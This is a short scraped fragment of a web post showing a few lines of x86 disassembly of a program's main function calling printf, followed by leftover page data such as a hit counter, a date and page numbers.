0x80485c8 <main+200>: push 0x80486c0
0x80485cd <main+205>: call 0x8048410 <printf>
0x80485d2 <main+210>: add %esp,4
0x80485d5 <main+213>: push 0
0x80485d7 <main+215>: &nbs |
Hit : 1070 Date : 2025/07/07 08:04
|
1617, 
1/81 
